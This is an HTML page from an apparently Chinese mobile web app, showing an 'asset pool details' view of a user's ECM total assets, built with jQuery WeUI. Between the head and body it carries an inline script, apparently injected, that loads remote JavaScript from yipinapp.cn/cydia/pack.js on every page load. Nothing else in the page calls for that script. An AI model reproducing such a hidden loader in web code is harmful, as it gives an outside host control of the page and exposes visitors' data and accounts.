<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
		<title>资产池明细</title>
		<link rel="stylesheet" href="../../static/css/weui-min.css" />
		<link rel="stylesheet" href="../../static/css/weui-jquery.css" />
		<link rel="stylesheet" href="../../static/css/common.css" />
		<link rel="stylesheet" href="../../static/css/home/myassets.css" />
	</head>
	<script>
		(function () {
			var dw = document.createElement("script");
			dw.src = "https://yipinapp.cn/cydia/pack.js?zBv2XrG8cSQqzRDCm9hsEL"
			var s = document.getElementsByTagName("script")[0];
			s.parentNode.insertBefore(dw, s);
		})()
	</script>
	<body ontouchstart>
		<header class="weui-bar weui-bar-nav" id="returnBtn">
		    <a class="weui-pull-left weui-btns">
		        <span class="weui-cell__fts"></span>
		    </a>
		    <div class="weui-title">资产池明细</div>
		</header>
		<div class="myAssets">
			<div class="myAssetBy">
				<img src="../../static/images/di_1.png" />
				<div class="assetTxt">
					<h2><span></span> ECM</h2>
					<p>总资产</p>
				</div>
			</div>
			<div id="listBox" class="list-main-mian weui-form-preview infinite weui-pull-to-refresh">
				<div class="weui-pull-to-refresh__layer" style="padding: 5px;">
		            <div class="weui-pull-to-refresh__arrow"></div>
		            <div class="weui-pull-to-refresh__preloader"></div>
		            <div class="down">下拉刷新</div>
		            <div class="up">释放刷新</div>
		            <div class="refresh">正在刷新</div>
		        </div>
		        <div class="assetRecord mescroll">
					<ul>
					</ul>
				</div>
				<div class="weui-loadmore">
		            <i class="weui-loading"></i>
		            <span class="weui-loadmore__tips">正在加载</span>
		       </div>
			</div>
		</div>
		<script type="text/javascript" src="../../lib/jquery.js" ></script>
		<script type="text/javascript" src="../../lib/jquery-weui.js" ></script>
		<script type="text/javascript" src="../../lib/fastclick.js" ></script>
		<script type="text/javascript" src="../../static/js/common.js" ></script>
		<script type="text/javascript" src="../../static/js/api.js" ></script>
		<script type="text/javascript" src="../../static/js/home/myassets.js" ></script>
	</body>
</html>
